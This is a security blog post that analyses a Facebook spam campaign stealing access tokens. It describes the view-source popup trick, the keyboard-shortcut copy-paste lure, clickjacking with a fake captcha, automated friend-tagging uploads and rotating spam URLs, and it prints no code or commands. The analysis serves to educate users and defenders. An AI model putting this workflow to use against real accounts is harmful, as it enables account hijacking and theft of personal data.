This post is about a new social engineering spam which is spreading virally on Facebook. I have recorded a video on how users fall prey to this. Click here to directly go to the video.
Nothing can beat the exploitation of the weakest link on the web - "The User". If a web user can be tricked to do certain actions through his mouse/keyboard, a clever spammer can achieve almost everything. This is known as social engineering and has no defense other than educating users about the tricks used by spammers, which is the goal of this post. [Related post: Analyzing the Rihanna Facebook spam]
The picture on the left has become quite popular on Facebook these days. Of course it is spread due to spam, which tags list of all friends of an infected user, comments on a user's behalf, steals user's info and what not. The message it displays raises the curiosity of users so much that they do anything out of desperation to watch it. Clicking on the picture takes the user to a different domain (out of Facebook) and asks users to do a series of actions. Once a user logs into Facebook (and for that matter any website) and interacts with another website in another tab, all bets are off and anything can happen. Since the target audience for this post can be non-technical FB users as well as techies, I have split the post accordingly.
For Non-Technical Facebook Users:
I have recorded a video on how this spam spreads. If you are using Chrome as your browser, you will see the steps shown in the below video. If you use Firefox, you will see a different sequence of steps. Firefox users, check this video instead.
After watching these clips, make sure you do not fall to such traps on any website. Facebook uses "access tokens", which uniquely identifies a user for a certain duration. On following the steps in the spam image, what you are doing is - you are simply giving away access token to the spammer. So the spammer's code can now post on Facebook on your behalf, steal your contact information, friends list and continue spamming with emails. In fact, spammers sell this stolen information to advertisers and make money out of end user's ignorance.
To steal access tokens of users, spammers lure them to perform certain actions (clicks/key press etc). Some of the previous spams (e.g., Rihanna Facebook spam) used Flash to automatically copy malicious script to clipboard and lured users to paste it in Facebook page's address bar. This is like making users to inject bad script into Facebook page. This no longer works in newer browsers, so spammers chose the converse of this technique - lure users to do a "copy" action (Ctrl+C) somewhere in Facebook page and then a "paste" action (Ctrl+V) in the spammer's site. By doing this, users give away their access tokens to spammers code. Once spammers get the token, as long as it expires, they can perform all actions on Facebook on behalf of the user. So at a high level, the latter is what happens in this spam. General techniques used by spammers to aid their mission are loopholes in Cross origin interactions and Clickjacking, apart from sevaral other browser hacks
Though the stealing technique is not new and didn't surprise me, what amused me is the level of desperation the spammer had in stealing content. For sure, our guy is a very good web developer who chose to make quick bucks. Unlike other spammers, this guy is not lazy and worked on all hurdles (read browser support for new features) to get things done. For instance, these are the libraries the spammer used in his code.
- Deck.js for those smooth transitions between pages (I thought the guy used flash since flash has access to clipboard, which reduces user's actions by one step). By the way, this is way better than http://slides.html5rocks.com/ for online presentations. Good one! :-)
- Modernizr for HTML5 feature detection
- jQuery backstretch for adding a dynamically-resized background image to the page.
- jQuery cookie - a jQuery plugin for reading, writing, deleting cookies
- Blob.js for implementing W3C's Blob interface in non-supporting browsers
- Canvas to blob for converting canvas elements into blob objects
- URI.js for simplifying working with URIs.
Why was it complex to analyze?
Thankfully, there are a couple of online tools which made my task easier.
As shown in the videos above, the code behaves differently in different browsers. So obviously there must be some user agent sniffing happening. After spending a lot of time, I came to know that the code in script files being served is varying with different user agents (thanks to diffnow.com for the quick comparison).
Why different tricks in different browsers?
Okay, this is the crux of the entire workflow. It took me a while to find out this and though it is subtle, it is a new learning for me as well. The idea is to open a popup window with "view-source:" protocol, which displays the source code of a web page (works only in Chrome and Firefox). If "view-source:" is pointed to Facebook connect URL, Facebook automatically attaches a valid access token, since the user already logged into Facebook (similar to attaching cookies in future requests, once a user is authenticated). Here is how the URL looks like, with the access token in it:
Now, if the spammer can get this URL, he can extract the access token and trigger requests using his script. This needs different behaviours in different browsers.
- In Internet Explorer, "view-source" protocol is not supported, so the spammer throws a fake captcha and asks user to enter certain verification code. He is using clickjacking to make the user submit his inputs. I tried in all versions of IE (7 to 10), but could not get the code working. He messed up with his CSS, so his positioning went wrong. Probably, IE was not his target.
- In Firefox, the code opens the popup with "view-source" protocol and asks the user to press these three keys in a sequence: "Ctrl+L", "Ctrl+C", "Ctrl+W". Anyone who uses keyboard shortcuts regularly can understand what this means. "Ctrl+L" shifts focus to address bar of the popup and selects the entire text. "Ctrl+C" copies it. "Ctrl+W" closes the popup window. However, the large values for "top" and "left" attributes puts the popup behind the active browser window, in spite of retaining focus in it. This popup behaviour is unique to firefox and hence firefox users will not have any suspicion. On pressing "Ctrl+V" in the spammer's page, the user's access token is pasted in spammer's web page and hence token is passed.
- In Chrome, the view-source protocol works, but the behaviour of popup is different. Popups appear above the active browser and hence the spammer has no choice but ask the user to right click and copy the URL, as shown in the pic to the right.
Using these simple tricks, spammers steal access tokens. Not 100% convincing for a decent techie, but they have proven to be popular among the masses. I won't be surprized if I come across newer spams which use "Fake Captcha" kind of techniques as shown by Kotowicz
What is the motive behind the spam?
Well, data is the currency on the web. After successful attack, the spammer has complete access to user's Facebook data, along with ids of friends, which he can sell to advertisers. I tried to take a dig at network calls and see if he is exporting data to any other site or endorsing some specific vendor. All I found is, he is associated with a Brazillian site called "Mobile Xpert" (https://mobilexpert.com.br). Found this from a Facebook Graph API call which points to Mobilexpert's FB page.
Can I have a look at network traffic, without running the code?
Sure, I have exported the HTTP calls being done by spammer's page to a HAR (HTTP Archive) file. You can get it from the github repo (careful, large file). To view it properly, open the file, copy its content, navigate to http://www.softwareishard.com/har/viewer/ (online HAR viewer), paste the code in the textbox, uncheck "Validate data before processing?" checkbox and hit "preview". You can view it similar to Firefox's network panel and analyze the traffic yourself. Check the FB graph API calls to see all the havoc which is happening (the call GET 244767798982043 is being done to Mobile Xpert's FB page).
How did the spam tag user's friends in the pic?
As said earlier, once the spammer's code has access token, it can do anything such as tagging friends, commenting on behalf of the user on the photo, stealing user info etc. You can check all these happening from the network traffic shown above.
- First, he loaded an image using <img src=""> from his server.
- Then he used HTML5 canvas and drew the image on the canvas using JS (Basic canvas example)
- Then he converted the canvas to blob using JS
- Then he used FormData of XHR2 specification to upload the blob via AJAX post!
I am not sure if this is a well known technique, but at least for me, this is a clever way of dealing with automated uploads. Have to see how many misuses are already going in the wild!
So is that all?
Not yet. Check the file "urls-jack.js" in the github repo. I was surprised to see that there are "495" unique URLs which host the spammer's code, each with a random set of characters as prefix and with multiple domains. For each image uploaded by the spam code, a random URL is chosen as a comment. This probably is to escape spam filters!
I am not sure if there are other hidden gimmicks. I wish I had more time to analze the code. Loved the way the spammer organized his code and his desperate attempts to achieve his goal - stealing user's access tokens. It was fun analyzing this code. Will update the post if I find anything interesting.